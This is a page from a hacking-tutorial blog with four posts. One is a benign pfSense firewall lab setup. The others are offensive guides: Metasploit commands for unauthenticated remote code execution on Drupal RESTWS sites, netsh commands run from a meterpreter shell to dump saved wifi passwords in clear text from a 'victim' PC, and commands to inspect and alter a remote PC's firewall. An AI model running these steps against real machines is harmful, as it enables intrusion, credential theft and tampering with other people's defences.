Hacking Articles|Raj Chandel's Blog

Hack Drupal Website using Drupal RESTWS Module Remote PHP Code Execution

at 10:52 PM Friday, July 29, 2016 0 comments

This module exploits a Remote PHP Code Execution vulnerability in Drupal RESTWS Module. Unauthenticated users can execute arbitrary code under the context of the web server user. RESTWS alters the default page callbacks for entities to provide additional functionality. A vulnerability in this approach allows an unauthenticated attacker to send specially crafted requests resulting in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 versions are affected by issue. This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.

Exploit Targets

RESTWS 2.x

Requirement

Attacker: kali Linux

Victim PC: drupal

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/drupal_restws_exec

msf exploit (drupal_restws_exec)>set targeturi /

msf exploit (drupal_restws_exec)>set rhost 192.168.0.4 (IP of Remote Host)

msf exploit (drupal_restws_exec)>set rport 80

msf exploit (drupal_restws_exec)>exploit

Firewall Pentest Lab Setup with pfsense in Vmware

at 9:30 AM 0 comments

Firewall: It is a computer system or network that is designed to block unauthorized access while permitting outward communication. Firewall holds a lot of importance our technical world as it assures our system's as well as data's security. And a firewall in a network helps us to secure the whole network. It acts as a network security device that grants or rejects network access to traffic flows between untrusted zones. Thus, importance of Firewall.

To secure a network we should always use a third party firewall instead of windows own firewall as it make configuration of all network easy and in one system only. If you will use windows own firewall you have to configure if PC by PC which will take a lot of your time.

Setting up a firewall can be complicating. Therefore in this article we will learn how to set up a firewall using PFSense. By setting this firewall we will create a wall between our networks which will delude our network into two parts i.e External network and internal network.

You can download ISO image for PFSenese from here:

Now that you have ISO image, setup PFSense in your virtual machine just like you setup your windows and turn its power on and PFSense will open:

And it will boot itself automatically in few seconds:

Once it’s rebooted, select accept these Settings

From the next dialogues box select Quick/Easy Install.

When you click on ok it will allow installation process to begin without asking unnecessary questions:

And the installation begins:

Now for installing custom configuration select Standard Kernel option.

And it will start installing:

Now, select Reboot option so that the firewall can start.

Thus, rebooting will begin.

After the rebooting process, it will ask you if you want to setup VLAN's. Here just type n for no and hit enter.

Now it will ask you to name WAN and LAN interface. Give le0 name to WAN and le1 to LAN. Then just hit enter when it asks you to name optional interface.

It will show you the interfaces and their name now and will require your permission to proceed. Press y for yes as you are permitting it to proceed.

Now, in the following image you can see that it has automatically taken IP address for WAN i.e 192.168.1.7, if you wish to set a desired IP for WAN then choose 2 option and press 1 for the configuration of WAN.

It will ask you that if you want to assign IPv4 IP address. Here, press n for no. When you hit enter it will ask you if you want to assign IPv4 IP address. Here, enter your desired IP address and press enter. Then it will ask you to give subnet mask for the IP address that you have just entered. Now as our IP address was of C-class we will give 24 as subnet mask. After hitting enter it will ask you if you u want to give upstream gateway. Here, just press enter. And when it asks you to set IPv6 via DHCP6 then simply press enter without typing anything else as we do not require IPv6. And when it asks you for HTTP web configuration press n for no.

You can see that your desired IP for WAN has been set up. Hit enter to continue.

Similarly, you can setup LAN IP address by selecting of 2 for assigning IP address and select 2 for LAN.

Just like before, it will sak uou for the IP address of LAN and so you enter your LAN IP address. And then it will ask you for subnet mask, here we have given subnet mask of 8 as our IP is of A-class. Just hit enter when it asks you to enter upstream gateway. And also hit enter when it asks you to enter IPv6 as we do not require it. And then press y for HTTP revert option.

And just like this, your LAN IP address has been set up. Now, press enter to continue.

Now to check that your firewall has been configured properly, lets ping an IP address. Select option 7 and enter the IP address you want to ping. If it successfully pings that means your firewall has been configured successfully. And you can press enter to continue.

So, this is how you can install and configure your firewall to protect your network.

Wifi Penetration Testing in Remote PC (Part 1)

at 7:24 AM Tuesday, July 26, 2016 0 comments

People often say "news travel fast". How? The answer is one word Wireless. Wireless network all around the world helps us to move faster in our life. It enables us to make more of already running time. But, today, wireless connections to the internet have become necessisity. And it is now very much possible to take advantage of this necessisity.

Wifi : It is technology that allows electronic devices to connect to internet in a given area. WiFi has a lot of advantages. Wireless networks are easy to set up and inexpensive. They're also unobtrusive -- unless you're on the lookout for a place to watch streaming movies on your tablet, you may not even notice when you're in a hotspot.A wireless network uses radio waves, just like cell phones, televisions and radios do. In fact, communication across a wireless network is a lot like two-way radio communication. Here's what happens:

1. A computer's wireless adapter translates data into a radio signal and transmits it using an antenna.

2. A wireless router receives the signal and decodes it. The router sends the information to the Internet using a physical, wired Ethernet connection.

The process also works in reverse, with the router receiving information from the Internet, translating it into a radio signal and sending it to the computer's wireless adapter.

When you connect your device to the wifi, your device will store all the information of wifi. And after taking over the control of Victim PC. You can know each and everything about their wifi router, including their password.

For WiFi Penetration Testing, Take a session through meterpreter and reach to the shell of your Remote PC. And run the following commands:

Our first command will allow us to see all the networks to which the remote PC has been ever connected till date.

netsh wlan show profiles

Our next command helps us to see the details and password of a particular router.

netsh wlan show profiles name=[profile name] key=clear

Here, profile name is wifi name.

The following image shows the detail of the router named "Yashika"

The next image shows us the password of the router named Yashika with the heading key content. We can see that password is 991*******

Our next command allows us to delete a particular wifi connection.

netsh wlan delete profile name=[profile name]

Here, profile name is wifi name.

Next command allows us to set the priority of a wifi network.

netsh wlan set profileorder name=[profile name]interface=[interface_name] priority=1

Here, profile name is wifi name and interface name is network types such as WLAN, LAN.

Next command allows us to stops our remote PC to automatically connect to a network.

netsh wlan set profileparameter name=[profile name] connectionmode=manual

Here, profile name is wifi name.

Next command allows us to export all the details about a wlan network.

netsh wlan export profile name=[profile name]

Here, profile name is wifi name

Next command helps us to import any wlan file to a particular wifi network.

netsh wlan add profile filename=[path_and_filename.xml] interface=[interface_name]

This is our Wifi Penetration Testing part -1

Firewall Penetration in Remote Windows PC (Part 3)

at 5:36 AM Sunday, July 24, 2016 0 comments

To execute all the given commands first you need to hack you victim, to do so click here.

To read part 1 click here and for part 2 here

In this article, we will learn about how to block /allow particular IP Address in remote PC Firewall. We will also learn how to view details of programs added to the exception/allowed list and the details of port added to the exception/allowed list. Along with this we will learn how to see the status of the main settings of Firewall and what its current profile, i.e is whether it is on or off.

First off all, to make any changes in firewall in Remote PC we should first be able to tell how to check mode of firewall, that is, whether its on or off. So for every following command, first, take a session through meterpreter along with administrator privileges. After doing so, go to the shell of the remote PC and type:

netsh advfirewall show currentprofiles

After knowing the profile of firewall we can see which programs are allowed by the host of Remote PC. For this, type:

netsh firewall show allowedprogram

We can also see which ports are allowed by the host of Remote PC. And for this, type:

netsh firewall show portopening

Our next command is to see the status of the main settings. And to see them, type:

netsh firewall show config

Next, we can also see the location of file in which all the firewall logs are kept. And for this, type:

netsh firewall show logging

Firewall also allows us to Block single IP address while allowing the others and vice versa. So first to let us learn how we can Block a single IP For this, type:

netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=192.168.0.15/32

(In the abobe command "/32" is a subnet mask of IP.)